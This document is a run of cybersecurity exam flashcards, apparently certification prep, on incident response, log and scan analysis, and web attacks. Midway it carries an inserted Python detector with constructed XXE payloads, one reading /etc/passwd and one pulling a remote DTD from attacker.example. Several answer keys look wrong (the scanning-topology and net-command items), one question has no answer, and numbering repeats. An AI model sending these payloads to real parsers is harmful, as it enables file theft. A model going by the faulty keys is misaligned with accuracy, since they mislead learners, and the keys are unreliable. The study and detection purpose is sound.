Which of the following is NOT a host-related indicator of compromise? A. Memory Consumption B. Beaconing C. Processor Consumption D. Drive Capacity Consumption
B. Beaconing Beaconing is considered a network-related IoC
110
A cybersecurity analyst notices the following XML transaction while reviewing the communication logs for a public-facing application that receives XML input directly from its clients: ]>&abc; Based on the output, which is true? A. The application is using parameterized queries to prevent XML injections B. An XML External Entity (XXE) vulnerability has been exploited and it is possible that the attacker has read the file "/etc/passwd" C. ISO-8859-1 only covers the Latin alphabet and may preclude other languages from being used D. There is no concern since "/etc/passwd" does not contain any system passwords
B. An XML External Entity (XXE) vulnerability has been exploited and it is possible that the attacker has read the file "/etc/passwd". The DOCTYPE declares an entity (abc) that points at a local file via SYSTEM, and the body then references &abc;, so the parser substitutes the file's contents into the document.
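A pre-parse check for the pattern in this card, as an added example that is not from the original flashcards. Only the tail of the card's XML is reproduced above, so the payload below is constructed in the same shape (entity named abc pointing at /etc/passwd); the entity name, the element names, and the attacker host in the parameter-entity variant are assumptions.

```python
import re
import xml.etree.ElementTree as ET

# Constructed payload modelled on the card's transaction (not the page's XML).
XXE_PAYLOAD = b"""<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY abc SYSTEM "file:///etc/passwd">
]>
<foo>&abc;</foo>"""

# Parameter-entity variant that fetches a remote DTD (constructed).
PARAM_ENTITY_PAYLOAD = (b'<?xml version="1.0"?><!DOCTYPE x [<!ENTITY % dtd SYSTEM '
                        b'"http://attacker.example/x.dtd"> %dtd;]><x/>')

BENIGN = b'<?xml version="1.0"?><order><id>42</id></order>'

DOCTYPE_RE = re.compile(rb"<!DOCTYPE", re.IGNORECASE)
# <!ENTITY name SYSTEM ...> or <!ENTITY % name SYSTEM/PUBLIC ...>
EXTERNAL_ENTITY_RE = re.compile(rb"<!ENTITY\s+(?:%\s+)?\S+\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE)


def classify(xml_bytes):
    """Verdict on the raw bytes before any parser touches them."""
    if EXTERNAL_ENTITY_RE.search(xml_bytes):
        return "external-entity"
    if DOCTYPE_RE.search(xml_bytes):
        return "dtd"
    return "clean"


def parse_untrusted(xml_bytes):
    """Refuse any document carrying a DTD; client input never needs one."""
    verdict = classify(xml_bytes)
    if verdict != "clean":
        raise ValueError(f"rejected XML input: {verdict}")
    return ET.fromstring(xml_bytes)


if __name__ == "__main__":
    for doc in (XXE_PAYLOAD, PARAM_ENTITY_PAYLOAD, BENIGN):
        print(classify(doc))
```

The check is deliberately blunt: rather than trying to decide which entities are safe, it rejects every inline DTD, which is also the configuration to apply in the XML parser itself (disable DTD processing and external entity resolution) so the check and the parser agree.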
111
Which of the following are the two most important factors when determining a containment strategy? A. Preservation of evidence B. Identification of whether the intrusion is the primary attack or a secondary one C. Prevention of an ongoing intrusion or data breach D. Avoidance of alerting the attacker that they have been discovered E. Ensuring the safety and security of all personnel
C & E
112
You're a cybersecurity analyst who has been given the output from a system administrator's Linux terminal. Based on the output, which of the following is true?
BEGIN OUTPUT
# nmap win2k16.local
Nmap scan report for win2k (192.168.2.15)
Host is up (0.132452s latency)
Not shown: 997 closed ports
PORT    STATE  SERVICE
22/tcp  open   ssh
80/tcp  open   http
# nc win2k16.local 80
220 win2k16.local DionTraining SMTP Server (Postfix/2.4.1)
# nc win2k16.local 22
SSH-2.0-OpenSSH_7.2 Debian-2
END OUTPUT
A. Your org has a vulnerable version of the SSH server software installed B. Your email server has been compromised C. Your email server is running on a non-standard port D. Your web server has been compromised
C. Your email server is running on a non-standard port. The banner grab shows an SMTP greeting (220 ...) on port 80; the standard SMTP port is 25.
113
A new security appliance was installed on a network as part of a managed service deployment. The vendor controls the appliance and the IT team cannot log in or configure it. The IT team is concerned about the appliance receiving the necessary updates. Which of the following should be performed to minimize the concern? A. Scan and patch the device B. Automatic Updates C. Configuration management D. Vulnerability scanning
D. Vulnerability scanning
114
Dion Training is concerned with the possibility of employees accessing another user's workstation in secured areas without their permission. Which would BEST prevent this from happening? A. Install security cameras in secure areas to monitor logins B. Require biometric identification for user logins C. Require username and password for user logins D. Enforce a policy that requires passwords to be changed every 30 days
B. Require biometric identification for user logins
115
Your company has just finished replacing all of its computers with brand new workstations. A coworker asks the company if she can have the old computers that are about to be thrown away so she can refurbish them by reinstalling a new OS and donate them. The owner thinks it's a great idea but is concerned about the sensitive info on the drives. What is the best solution to sanitize or destroy the data while ensuring the computers will still be usable? A. Purging B. Shredding C. Degaussing D. Wiping
D. Wiping. A hard drive can't be reused once it has been degaussed, and generally can't be reused after purging.
116
Which term is used in software development to refer to the method in which app and platform updates are committed to a production environment rapidly? A. Continuous integration B. Continuous monitoring C. Continuous deployment D. Continuous delivery
C. Continuous deployment
117
A major cyber incident has occurred at your org. As part of the incident response team you have been tasked with analyzing the incident, including who caused it, what systems were affected, when it occurred, where it originated from, and why it happened. What kind of report are you preparing? A. Incident declaration report B. Incident response report C. Regulatory reporting D. Root cause analysis report
B. Incident response report
118
The security team from Kelly Nexis Analytics has detected the Apache Log4j vulnerability in JIRA. What is a practical method for the team to eliminate this vulnerability? A. Patching B. Antivirus Software C. Virtual Private Network D. Firewall Implementation
A. Patching
119
Which of the following vulnerability scanning tools would be used to conduct a web application vulnerability assessment? A. OpenVAS B. Nessus C. Nikto D. Qualys
C. Nikto
120
Which of the following has occurred if a device fails to activate because it has detected an unknown modification? A. Improper authentication B. Obfuscation C. Self-checking D. Failed trust foundry
C. Self-checking
121
Which of the following is a technique used in Secure Disposal? A. Zero-fill B. Degaussing C. Erasing D. Clearing
B. Degaussing Clearing does not destroy
122
An SNMP sweep is being conducted but the sweep received no-response replies from multiple addresses that are believed to belong to active hosts. What does this indicate to a cybersecurity analyst? A. The community string being used is invalid B. Any listed answers may be true C. The machines are not running SNMP servers D. The machines are unreachable
B. Any listed answers may be true
123
Dion Consulting Group has been hired to analyze the cybersecurity model for a new videogame console system. The manufacturer's team has come up with four recommendations to prevent intellectual property theft and piracy. As the cybersecurity consultant on this project, which of the following would you recommend implementing first? A. Ensure that each individual console has its own unique key for decrypting individual licenses and tracking which console has purchased which game B. Ensure that all screen capture content is visibly watermarked C. Ensure that all games for the console are distributed encrypted so that they can only be decrypted on the game console D. Ensure that all games require excessive storage sizes so that it is difficult for unauthorized parties to distribute
A. Ensure that each individual console has its own unique key for decrypting individual licenses and tracking which console has purchases which game
124
Which of the following protocols is commonly used to collect information about CPU utilization and memory usage from network devices? A. NetFlow B. SNMP C. MIB D. SMTP
B. SNMP (Simple Network Management Protocol)
125
Which protocol is paired with OAuth2 to provide authentication of users in a federated identity management solution? A. Kerberos B. ADFS C. OpenID Connect D. SAML
C. OpenID Connect
126
What type of information will a Cisco switch log be configured to capture logs at level 7? A. Emergencies B. Warnings C. Debugging D. Errors
C. Debugging. Cisco syslog severities run 0 emergencies, 1 alerts, 2 critical, 3 errors, 4 warnings, 5 notifications, 6 informational, 7 debugging; configuring level 7 captures everything.
127
A vulnerability scan has returned the following:
Detailed Results
10.56.17.21 (APACHE-2.4)
Windows Shares
Category: Windows
CVE ID: -
Vendor Ref: -
Bugtraq ID: -
Service Modified - 8.30.2017
Enumeration Results:
print$  c:\windows\system32\spool\drivers
files   c:\FileShare\Accounting
Temp    c:\temp
What best describes the output? A. There is no CVE present, so this is a false positive caused by Apache running on a Windows server B. There is an unknown bug in an Apache server with no Bugtraq ID C. Windows Defender has a known exploit that must be resolved or patched D. Connecting to the host using a null session allows enumeration of the share names on the host
D. Connecting to the host using a null session allows enumeration of the share names on the host
127
Your org is transitioning to a cloud environment and wants to ensure its new infrastructure is secure. What tool could you utilize to assess the security of your cloud infrastructure? A. Pacu B. Nmap C. Nessus D. Burp Suite
A. Pacu This is designed for AWS environments. Nessus is not specifically designed for cloud infrastructure assessments
128
You are conducting an incident response and want to determine if any account-based IoCs exist in a compromised server. Which of the following would you NOT search for on the server? A. Unauthorized sessions B. Malicious processes C. Off-hours usage D. Failed logins
B. Malicious processes Malicious process is host-based IoC and not directly associated with an account-based IoC
129
Which of the following actions should you perform during the post-incident activities of an incident response? A. Create an incident summary report with in-depth technical recommendations for future resourcing and budgeting B. Perform evidence retention in accordance with the timescale defined by the regulatory or legal impact of the incident C. Ensure confidentiality of the lessons learned report by not sharing it beyond the incident response team who handled the investigation D. Sanitize storage devices that contain any dd images collected to prevent liability arising from evidence collection
B. Perform evidence retention in accordance with the timescale defined by the regulatory or legal impact of the incident
130
A cybersecurity analyst has deployed a custom DLP signature to alert on any files that contain numbers in format of a social security number. Which of the following concepts within DLP is being utilized? A. Classification B. Statistical matching C. Document matching D. Exact data match
D. Exact data match
131
What port does LDAP run on?
389
131
Your org has just migrated to provisioning its corporate desktops as virtual machines and accessing them using thin clients. The org believes this will enhance security since the desktop can be rewritten with a new baseline image every time the user logs into it. Based on this scenario, which technology has the organization adopted? A. VPC B. UEBA C. VPN D. VDI
D. VDI VDI = Virtual Desktop Infrastructure VPC = Virtual Private Cloud UEBA = User and Entity Behavior Analytics
132
Which of the following is not normally part of an endpoint security suite? A. IPS B. Software firewall C. VPN D. Anti-virus
C. VPN
133
Natalie wants to create a backup of the permissions before making changes to the Linux workstation she will remediate. What Linux tool can she use to back up the permissions of the system's complete directory structure? A. iptables B. chbkup C. getfacl D. aclman
C. getfacl. aclman and chbkup are not legitimate commands; iptables is used to configure the firewall.
134
During a simulated attack on your org's network, the red team identified several vulnerabilities and successfully exfiltrated data. The red team then used these vulnerabilities and the steps they took to create an example of a possible real-world attack. Which framework does this attack sequence BEST represent? A. MITRE ATT&CK B. OWASP Testing Guide C. Cyber Kill Chain D. Diamond Model of Intrusion Analysis
C. Cyber Kill Chain
135
Matt is creating a scoping worksheet for an upcoming penetration test for his organization. Which of the following techniques is NOT usually included in a pen test? A. Denial-of-service Attack B. Physical Penetration Attempts C. Reverse Engineering D. Social Engineering
A. Denial-of-service Attack
136
You have been given access to a Windows system located on an Active Directory domain as part of a white box pen test. Which of the following commands would provide information about the other systems on this network? A. net group B. net use C. net config D. net user
B. net use. net group is only used on DCs; net user would show accounts; net config allows server and workstation services to be controlled once identified.
137
During a port scan you discovered a service running on a registered port. Based on this, what do you know about this service? A. The service is running on a port between 0-1023 B. The service's name on the registered port C. The service is running on a port between 1024-49151 D. The vulnerability status of the service on the registered port
C. The service is running on a port between 1024-49151
138
Which of the following categories of controls are firewalls, IDS, and a RADIUS server classified as? A. Administrative Controls B. Technical Controls C. Physical Controls D. Compensating Controls
B. Technical Controls
139
You just finished conducting a remote scan of a class C network block using the following command 'nmap -sS 202.15.73.0/24'. The results only showed a single web server. Which of the following techniques would allow you to gather additional info about the network? A. Use an IPS evasion technique B. Scan using the -p 1-65535 flag C. Use a UDP scan D. Perform a scan from on-site
D. Perform a scan from on-site
140
Which tool should a malware analyst utilize to track the registry's changes and the file system while running a suspicious executable on a Windows system? A. ProcDump B. Autoruns C. Process Monitor D. DiskMon
C. Process Monitor. Autoruns shows what programs are configured to run during bootup or login.
141
What is a reverse proxy commonly used for? A. Directing traffic to internal services if the contents of the traffic comply with the policy B. Allowing access to a virtual private cloud C. To prevent unauthorized use of cloud services from the local network D. To obfuscate the origin of a user within a network
A. Directing traffic to internal services if the contents of the traffic comply with the policy
142
During which incident response phase is the preservation of evidence performed? A. Detection and analysis B. Containment, eradication, and recovery C. Preparation D. Post-incident activity
B. Containment, eradication, and recovery
143
During a recent security incident, you, as an incident responder, documented each action and decision that took place, from the initial detection to final remediation. This detailed timeline could prove particularly useful for which part of the incident response reporting? A. Impact B. Executive summary C. Lessons learned D. Scope
C. Lessons learned
144
You're analyzing the logs of a web server and see the following: 192.168.1.25 - - [05/Aug/2020:15:16:42 -0400] "Get /%27%27;!-%22%3CDION%3E=&{()} HTTP/1.1" 404 310 "-" "Mozilla/5.0 (X11; Linux x86_64; en-US; rv:1.9.0.12)Gecko/2009070812 Ubuntu/19.04 (disco dingo) Firefox/3.0.12" Based on this, which of the following attacks was attempted? A. XML injection B. Buffer overflow C. SQL injection D. XSS
D. XSS The attack was obfuscated by the attacker using HTML encoding. The encoding of %27%27 translates to two single quote marks (' ').
145
You are analyzing DNS logs looking for indicators of compromise associated with the use of a fast-flux network. You are already aware that the names involved in this particular fast-flux network are longer than 50 characters and always end in a .org top-level domain. Which of the following REGEX expressions would you use to filter DNS traffic that matches this? A. \b[A-Za-z0-9\.\-]{50,251}+\.org B. \b[A-Za-z0-9.-]{50,251}+.org C. \b[A-Za-z0-9\.-]{50,251}+.org D. \b(A-Za-z0-9\.\-){50,251}|\.org
A. \b[A-Za-z0-9\.\-]{50,251}+\.org + means it matches between 50 and 251 instances of any of the preceding letters (A-Z, a-z, 0-9, period, and the minus symbol)
146
During the Sony Pictures hack in 2014, the attackers installed a wiper malware named Destover on Sony's systems to erase data. Which phase of the Cyber Kill Chain does this represent? A. Delivery B. Installation C. Reconnaissance D. Actions and Objectives
B. Installation
147
A penetration tester is using a known vulnerability to compromise an Apache webserver. After they gain access to the server, what is their next step to pivot to a protected system behind the DMZ? A. Vulnerability scanning B. Patching C. Privilege escalation D. Installing additional tools
C. Privilege escalation
148
A cybersecurity analyst is reviewing the DNS logs for his company's networks and sees the following:
$ cat dns.log | bro-cut query
gu2m9qhychvxrvh0eift.com
oxboxkgtyx9veimcuyri.com
4f3mvgt0ah6mz92frsmo.com
asvi6d6ogplqyfhrn0p7.com
5qlark642x5jbissjm86.com
Based on this potential IoC, which of the following hypotheses should you make to begin threat hunting? A. The DNS server is running out of memory due to a memory resource exhaustion attack B. Data exfiltration is being attempted by an APT C. Fast flux DNS is being used for an attacker's C2 D. The DNS server's hard drive is being used as a staging location for a data exfiltration
C. Fast flux DNS is being used for an attacker's C2
149
After a successful spear-phishing attack, an adversary has gained access to your organization's network. The adversary then performs a Pass-the-Hash attack to gain administrative privileges, moves horizontally in the network, and finally exfiltrates sensitive data. What stage of the MITRE ATT&CK framework does this movement represent? A. Lateral Movement B. Exfiltration C. Initial Access D. Credential Access
A. Lateral Movement
150
You suspect that a service called explorer.exe on a Windows server is malicious, and you need to terminate it. Which of the following tools would NOT be able to terminate it? A. sc B. wmic C. services.msc D. secpol.msc
D. secpol.msc secpol.msc = security policy auditor
151
In the preparation phase of the incident management life cycle, which aspect involves assembling and maintaining a collection of scripts, applications, and other software that can be used to respond to a cyber threat effectively? A. Incident response plan B. Business continuity disaster recovery C. Tools D. Playbooks
C. Tools
152
Evaluate the following log entry: Jan 11 05:52:56 lx1 kernel: iptables INPUT drop IN=eth0 OUT= MAC=00:15:5d:01:ca:55:00:15:5d:01:ca:ad:08:00 SRC=10.1.0.102 DST=10.1.0.10 LEN=52 TOS=0x00 PREC=0x00 TTL=128 ID=3988 DF PROTO=TCP SPT=2583 DPT=23 WINDOW=64240 RES=0x00 SYN URGP=0 Based on this, which statements are true? A. MAC filtering is enabled on the firewall B. Packets are being blocked inbound to and outbound from the network C. The packet was blocked outbound from the network D. An attempted connection to the ssh service was prevented E. The packet was blocked inbound to the network F. An attempted connection to the telnet service was prevented
E. The packet was blocked inbound to the network F. An attempted connection to the telnet service was prevented
153
When assessing risks to your organization's IT infrastructure, which framework allows for prioritization based on the potential impact of threats? A. ISO 31000 B. OWASP Top 10 C. NIST's Cybersecurity Framework D. Center for Internet Security (CIS) Top 20 Critical Security Controls
C. NIST's Cybersecurity Framework
154
A cybersecurity analyst is working at a college that wants to increase its network's security by implementing vulnerability scans of centrally managed workstations, student laptops, and faculty laptops. Any proposed solution must scale up and down as new students and faculty use the network. Additionally, the analyst wants to minimize the number of false positives to ensure accuracy in their results. The chosen solution must also be centrally-managed through an enterprise console. Which of the following scanning topologies would be BEST able to meet these requirements? A. Combination of server-based and agent-based scanning engines B. Passive scanning engine located at the core of the network infrastructure C. Combination of cloud-based and server-based scanning engines D. Active scanning engine installed on the enterprise console
D. Active scanning engine installed on the enterprise console
154
You have been hired to investigate a possible insider threat from a user named Terri. Which of the following commands would successfully look through all the log files in '/var/log' for any references to "Terri" or "terri" on a Linux server? A. find /var/log/ -exec grep -H -e "'terri' OR 'Terri'" {}\; 2> /dev/null B. find /var/log/ -name *.log -exec grep -H -e "'Terri' OR 'terri'" {} \; 2>/dev/null C. find /var/log/ -exec grep -H -e "[Tt]erri" {} \; 2> /dev/null D. find /var/log/ -name "*.log" -exec grep -H -e "[Tt]erri" {} \; 2>/dev/null
C. find /var/log/ -exec grep -H -e "[Tt]erri" {} \; 2> /dev/null
154
Ted, a file server admin, has noticed that a large number of sensitive files have been transferred from a corporate workstation to an IP address outside of the local area network. Ted contacts his company's security analyst, who verifies that the workstation's anti-malware solution is up-to-date, and the network's firewall is properly configured. What type of attack most likely occurred to allow the exfiltration of the files from the workstation? A. Session hijacking B. Zero-day C. MAC spoofing D. Impersonation
B. Zero-day
155
You are conducting a code review of a program and observe that the calculation 0xffffffff+1 was attempted, but the result was returned as 0x0000000. Based on this, what type of exploit could be created against this program? A. Password spraying B. Integer overflow attack C. Impersonation D. SQL injection
B. Integer overflow attack
156
You are investigating traffic involving three separate IP addresses (192.168.66.6, 10.66.6.10, and 172.16.66.1). Which REGEX expression would you use to be able to capture ONLY those three IP addresses in a single statement? A. \b[192\.168\.66\.6]+[10\.66\.6\.10]+[172\.16\.66\.1]\b B. \b(192\.168\.66\.6)+(10\.66\.6\.10)+(172\.16\.66\.1)\b C. \b[192\.168\.66\.6]|[10\.66\.6\.10]|[172\.16\.66\.1]\b D. \b(192\.168\.66\.6)|(10\.66\.6\.10)|(172\.16\.66\.1)\b
156
A cybersecurity analyst is attempting to classify network traffic within an organization. The analyst runs the tcpdump command and receives the following:
$ tcpdump -n -i eth0
15:01:35.170763 IP 10.0.19.121.52497 > 11.154.12.121.ssh: P 105:157(52) ack 1806 win 16549
15:01:35.170776 IP 11.154.12.121.ssh > 10.0.19.121.52397: P 23988:24136(148) ack 157 win 113
15:01:35.170894 IP 11.154.12.121.ssh > 10.0.19.121.52497: P 24136:24380(244) ack 157 win 113
Which statement is true? A. 11.154.12.121 is under attack from a host at 10.0.19.121 B. 11.154.12.121 is a client that is accessing an SSH server over port 52497 C. 10.0.19.121 is a client that is accessing an SSH server over port 52497 D. 10.0.19.121 is under attack from a host at 11.154.12.121
C. 10.0.19.121 is a client accessing an SSH server over port 52497
157
You just visited an e-commerce website by typing in its URL during a vulnerability assessment. You discovered that an administrative web frontend for the server's backend application is accessible over the internet. Testing this frontend, you discovered that the default password for the application is accepted. Which of the following recommendations should you make to the website owner to remediate this discovered vulnerability? (Select 3) A. Conduct a penetration test against the organization's IP space B. Require two-factor authentication for access to the application C. Whitelist all specific IP blocks that use this application D. Rename the URL to a more obscure name E. Require an alphanumeric passphrase for the application's default password F. Change the username and default password
B. Require two-factor authentication for access to the application C. Whitelist all specific IP blocks that use this application F. Change the username and default password
158
Which of the following provides a cryptographic authentication mechanism to positively identify an organization as the authorized sender of email for a particular domain name? A. DKIM B. DMARC C. SMTP D. SPF
A. DKIM
159
You are going to perform a forensic disk image of a macOS laptop. What type of hard drive format should you expect to encounter? A. exFAT B. HFS+ C. NTFS D. FAT32
B. HFS+ (Hierarchical File System Plus). macOS doesn't support FAT32 and exFAT.
160
You are analyzing the SIEM for your company's e-commerce server when you notice the following URL in the logs of your SIEM: https://www.diontraining.com/add_to_cart.php?itemId=5"+perItemPrice="0.00"+quantity="100"+/> A. SQL injection B. Session hijacking C. Buffer overflow D. XML injection
D. XML injection. XML injection manipulates or compromises the logic of an XML application or service.
161
You suspect that your server has been the victim of a web-based attack. Which of the following ports would most likely be seen in the logs to indicate the attack's target? A. 443 B. 389 C. 21 D. 3389
A. 443
162
After 9 months of C++ programming, the team at Whammiedyne Systems has released their new software application. Within just 2 weeks of release, though, the security team discovered multiple serious vulnerabilities in the application that must be corrected. To retrofit the source code to include the required security controls will take 2 months of labor at the cost of $100,000. Which development framework should Whammiedyne use in the future to prevent this situation from occurring in other projects? A. DevOps B. Waterfall Model C. DevSecOps D. Agile Model
C. DevSecOps
163
Which of the following is the most important feature to consider when designing a system on a chip? A. Space and power savings B. Ability to interface with industrial control systems C. Type of real-time operating system in use D. Ability to be reconfigured after manufacture
A. Space and power savings
164
You are a cybersecurity analyst working for an accounting firm that manages the accounting for multiple smaller firms. You have successfully detected an APT operating in your company's network that appears to have been there for at least 8 months. In conducting a qualitative assessment of the impact, which of the following factors should be most prominently mentioned in your report to your firm's executives? (Select 2) A. Downtime B. Recovery time C. Data integrity D. Economic E. Detection time
C. Data integrity D. Economic
165
The Pass Certs Fast corporation has recently been embarrassed by several high profile data breaches. The CIO proposes improving the company's cybersecurity posture by migrating images of all the current servers and infrastructure into a cloud-based environment. What, if any, is the flaw in moving forward with this approach? A. This approach only changes the location of the network and not the attack surface of it B. This is a reasonable approach that will increase the security of the servers and infrastructure C. The company has already paid for the physical servers and will not fully realize their ROI on them due to the migration D. This approach assumes that the cloud will provide better security than is currently done on-site
A. This approach only changes the location of the network and not the attack surface of it
166
You have been asked to scan your company's website using the OWASP ZAP tool. When you perform the scan, you receive the following warning: "The AUTOCOMPLETE output is not disabled in HTML FORM/INPUT containing password type input. Passwords may be stored in browsers and retrieved." You begin to investigate further by reviewing a portion of the HTML code from the website that is listed below:
Enter your username:

Enter your Password:

Based on your analysis, what action should you take? A. You recommend that the system admin disables SSL on the server and implements TLS instead B. You tell the developer to review their code and implement a bug/code fix C. You recommend that the system admin pushes out a GPO update to reconfigure the web browsers security settings D. This is a false positive, and you should implement a scanner exception to ensure you don't receive this again during your next scan
B. You tell the developer to review their code and implement a bug/code fix
167
Jack is assessing the likelihood of reconnaissance activities being performed against his organization. Which of the following would best classify the likelihood of a port scan being conducted against his DMZ? A. None B. High C. Medium D. Low
B. High
168
An organization utilizes a BYOD policy with its employees. This allows the employees to store sensitive corporate data on their personally owned devices. Which of the following occurred if an employee accidentally left their device in the back of a taxi? A. Failed data loss prevention B. Failed deperimeterization management C. An advanced persistent threat D. A data breach
B. Failed deperimeterization management
169
Which of the following attacks would most likely be used to create an inadvertent disclosure of information from an organization's database? A. SQL injection B. Buffer overflow C. Denial of service D. Cross-site scripting
A. SQL injection
170
An organization has hired a cybersecurity analyst to conduct an assessment of their current security posture. The analyst begins by conducting an external assessment against the organization's network to determine what information is exposed to potential external attackers. What technique should the analyst perform first? A. Enumeration B. Intranet portal reviews C. DNS query log reviews D. Technical control audits
A. Enumeration
171
Which of the following will an adversary do during the weaponization phase of the Lockheed Martin kill chain? (Select three) A. Obtain a weaponizer B. Conduct social media interactions with targeted individuals C. Select a decoy document to present to the victim D. Harvest email addresses E. Select backdoor implant and appropriate command and control infrastructure for operation F. Compromise the target's servers
A. Obtain weaponizer C. Select a decoy document to present to the victim E. Select backdoor implant and appropriate command and control infrastructure for operation
172
Which of the following vulnerabilities was the MOST critical due to its high potential impact and exploitability? A. Stagefright B. Shellshock C. Logjam D. Drupalgeddon
B. Shellshock
173
Which of the following is the difference between an incident summary report and lessons-learned report? A. Both a lessons learned report and an incident summary report are designed for a technical audience B. A lessons-learned report is designed for a non-technical audience C. Both a lessons learned report and an incident summary report are designed for a non-technical audience D. An incident summary report is designed for a non-technical audience
D. An incident summary report is designed for a non-technical audience
174
After a sophisticated spear-phishing attack compromised your organization's financial database, the incident response team engages in a meticulous examination of the event. They aim to preserve and scrutinize digital evidence, uncover the exact method of the breach, and gauge its impact on your organization. What is this meticulous post-incident examination known as? A. Lessons learned B. Incident response plan C. Forensic analysis D. Root cause analysis
C. Forensic analysis
175
During an incident response, your team identified that an attacker performed a scan on your network, then delivered malware via a phishing email, which was exploited to install a backdoor on the system. The attacker then executed commands to exfiltrate data. Which framework would BEST represent this attack sequence? A. Cyber Kill Chain B. MITRE ATT&CK C. OWASP Testing Guide D. Diamond Model of Intrusion Analysis
A. Cyber Kill Chain